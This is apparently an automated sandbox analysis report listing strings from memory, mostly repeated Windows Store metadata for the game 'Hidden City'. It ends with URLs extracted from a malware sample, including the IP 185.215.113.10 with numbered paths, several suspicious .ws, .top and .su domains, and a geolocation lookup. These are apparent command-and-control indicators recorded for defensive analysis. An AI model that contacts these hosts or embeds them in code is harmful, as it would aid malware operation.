arketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000021.00000003.562826880.00000229F1D5B000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000021.00000003.562448678.00000229F1D79000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000021.00000003.562448678.00000229F1D79000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000021.00000003.562448678.00000229F1D79000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000021.00000003.562652421.00000229F1DB5000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000021.00000003.562652421.00000229F1DB5000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000021.00000003.562652421.00000229F1DB5000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName

Source: unknown

DNS traffic detected: queries for: api.wipmania.com

Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://185.215.113.10/
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/1
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/1H
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/1http://185.215.113.10/6
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/2http://185.215.113.10/1
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/4
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/4http://185.215.113.10/3http://185.215.113.10/3http://185.215.113.10/5
Source: svchost.exe, 00000001.00000002.1647181192.000000000082C000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/5
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/5http://185.215.113.10/6http://185.215.113.10/4http://tldrbox.top/6
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/5http://185.215.113.10/6http://185.215.113.10/6
Source: svchost.exe, 00000001.00000002.1646311546.00000000001B9000.00000004.00000001.sdmp, svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/6
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/6http://185.215.113.10/2
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/6http://185.215.113.10/6http://tldrbox.top/6
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/6tsrv4.ws
Source: svchost.exe, 00000001.00000002.1646311546.00000000001B9000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.10/6u/6
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/htt
Source: svchost.exe, 00000023.00000003.1113215680.0000019B88951000.00000004.00000001.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbc48496-2624191407-3283318427-1255436723
Source: svchost.exe, 00000023.00000002.1631119861.0000019B89019000.00000004.00000001.sdmp	String found in binary or memory: http://Passport.NET/tbpose
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237445887.0000000000C5A000.00000004.00000020.sdmp	String found in binary or memory: http://api.wipmania.com
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://api.wipmania.com/
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237445887.0000000000C5A000.00000004.00000020.sdmp	String found in binary or memory: http://api.wipmania.com/&4
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://api.wipmania.com/UAMozilla/5.0
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237461258.0000000000C74000.00000004.00000020.sdmp	String found in binary or memory: http://api.wipmania.com/a
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237445887.0000000000C5A000.00000004.00000020.sdmp	String found in binary or memory: http://api.wipmania.com/s%
Source: svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: svchost.exe, 00000021.00000002.585822034.00000229F1D00000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: svchost.exe, 00000021.00000002.585822034.00000229F1D00000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000004.00000003.598230422.00000201AC804000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
Source: svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
